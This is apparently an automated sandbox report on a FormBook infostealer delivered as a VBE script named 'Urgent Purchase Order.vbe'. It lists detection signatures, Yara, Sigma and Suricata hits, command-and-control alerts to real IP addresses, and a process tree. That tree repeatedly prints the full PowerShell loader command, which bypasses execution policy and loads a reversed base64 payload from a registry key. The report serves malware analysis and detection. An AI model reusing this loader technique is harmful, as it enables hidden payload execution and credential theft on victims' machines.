Windows
Analysis Report
Urgent Purchase Order.vbe
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential evasive VBS script found (sleep loop)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7772 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Urgen t Purchase Order.vbe " MD5: A47CBE969EA935BDD3AB568BB126BC80) WmiPrvSE.exe (PID: 1812 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) powershell.exe (PID: 3180 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 8460 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) RNDzmzHPyfZMe3si.exe (PID: 6844 cmdline:
"C:\Progra m Files (x 86)\IMBADn IrYEVxeURB JUkRqQsVcb BRgVGEevzN pQkJG\IUrm 4tIZbI.exe " MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A) xcopy.exe (PID: 8920 cmdline:
"C:\Window s\SysWOW64 \xcopy.exe " MD5: 7E9B7CE496D09F70C072930940F9F02C) firefox.exe (PID: 7684 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
wscript.exe (PID: 1292 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\App Data\Roami ng\LKeZAYN mpVLnixJ.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 6524 cmdline:
"C:\Window s\system32 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 9104 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 9112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 7836 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 1936 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 2224 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 3956 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 3232 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 5296 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 4948 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 8784 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 1500 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 8184 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 8728 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 2680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 9084 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 2544 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 6820 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 6680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 7268 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866) powershell.exe (PID: 7576 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -windo wstyle hid den -noexi t -Command [AppDomai n]::Curren tDomain.Lo ad([Conver t]::FromBa se64String ((-join (G et-ItemPro perty -Lit eralPath ' HKCU:\Soft ware\LKeZA YNmpVLnixJ ' -Name 's ').s | For Each-Objec t {$_[-1.. -($_.Lengt h)]}))); [ b.b]::b('L KeZAYNmpVL nixJ') MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) vbc.exe (PID: 8060 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\vbc .exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
rundll32.exe (PID: 8288 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-14T14:20:44.808602+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58256 | 199.59.243.228 | 80 | TCP |
2025-03-14T14:21:09.020473+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58260 | 8.210.49.139 | 80 | TCP |
2025-03-14T14:21:22.188265+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58264 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:39.563917+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58268 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:52.873250+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58272 | 162.0.213.94 | 80 | TCP |
2025-03-14T14:22:06.753723+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58276 | 144.76.229.203 | 80 | TCP |
2025-03-14T14:22:20.112898+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58280 | 188.114.96.3 | 80 | TCP |
2025-03-14T14:22:33.338768+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58284 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:22:46.728589+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58288 | 92.204.40.98 | 80 | TCP |
2025-03-14T14:23:38.623924+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58292 | 104.21.112.1 | 80 | TCP |
2025-03-14T14:23:54.832669+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58296 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:10.849453+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58300 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:24.050488+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58304 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:24:37.229920+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 58308 | 13.248.169.48 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-14T14:20:44.808602+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58256 | 199.59.243.228 | 80 | TCP |
2025-03-14T14:21:09.020473+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58260 | 8.210.49.139 | 80 | TCP |
2025-03-14T14:21:22.188265+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58264 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:39.563917+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58268 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:52.873250+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58272 | 162.0.213.94 | 80 | TCP |
2025-03-14T14:22:06.753723+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58276 | 144.76.229.203 | 80 | TCP |
2025-03-14T14:22:20.112898+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58280 | 188.114.96.3 | 80 | TCP |
2025-03-14T14:22:33.338768+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58284 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:22:46.728589+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58288 | 92.204.40.98 | 80 | TCP |
2025-03-14T14:23:38.623924+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58292 | 104.21.112.1 | 80 | TCP |
2025-03-14T14:23:54.832669+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58296 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:10.849453+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58300 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:24.050488+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58304 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:24:37.229920+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 58308 | 13.248.169.48 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-14T14:21:01.246409+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58257 | 8.210.49.139 | 80 | TCP |
2025-03-14T14:21:03.878423+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58258 | 8.210.49.139 | 80 | TCP |
2025-03-14T14:21:06.473741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58259 | 8.210.49.139 | 80 | TCP |
2025-03-14T14:21:14.555484+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58261 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:17.131044+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58262 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:19.644960+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58263 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:27.756903+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58265 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:30.441463+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58266 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:32.936399+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58267 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:21:45.282816+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58269 | 162.0.213.94 | 80 | TCP |
2025-03-14T14:21:47.791301+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58270 | 162.0.213.94 | 80 | TCP |
2025-03-14T14:21:50.316173+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58271 | 162.0.213.94 | 80 | TCP |
2025-03-14T14:21:58.729601+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58273 | 144.76.229.203 | 80 | TCP |
2025-03-14T14:22:01.263206+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58274 | 144.76.229.203 | 80 | TCP |
2025-03-14T14:22:04.195366+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58275 | 144.76.229.203 | 80 | TCP |
2025-03-14T14:22:12.449469+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58277 | 188.114.96.3 | 80 | TCP |
2025-03-14T14:22:15.071376+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58278 | 188.114.96.3 | 80 | TCP |
2025-03-14T14:22:17.581017+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58279 | 188.114.96.3 | 80 | TCP |
2025-03-14T14:22:25.663015+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58281 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:22:28.192591+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58282 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:22:30.783551+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58283 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:22:39.100912+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58285 | 92.204.40.98 | 80 | TCP |
2025-03-14T14:22:41.654214+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58286 | 92.204.40.98 | 80 | TCP |
2025-03-14T14:22:44.158495+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58287 | 92.204.40.98 | 80 | TCP |
2025-03-14T14:22:53.291327+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58289 | 104.21.112.1 | 80 | TCP |
2025-03-14T14:22:55.838171+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58290 | 104.21.112.1 | 80 | TCP |
2025-03-14T14:22:58.396852+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58291 | 104.21.112.1 | 80 | TCP |
2025-03-14T14:23:44.172458+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58293 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:23:46.760793+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58294 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:23:49.279887+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58295 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:00.326349+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58297 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:03.284678+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58298 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:05.725894+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58299 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:16.380476+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58301 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:24:18.977574+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58302 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:24:21.489454+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58303 | 3.33.130.190 | 80 | TCP |
2025-03-14T14:24:29.541752+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58305 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:32.103547+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58306 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:34.656065+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58307 | 13.248.169.48 | 80 | TCP |
2025-03-14T14:24:42.749594+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 58309 | 3.33.130.190 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-14T14:21:19.644960+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.5 | 58263 | 13.248.169.48 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Integrated Neural Analysis Model: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 18_2_02D6C850 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Code function: | 17_2_088D039E | |
Source: | Code function: | 17_2_088CC4B8 | |
Source: | Code function: | 18_2_02D59EE0 | |
Source: | Code function: | 18_2_035704CF |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
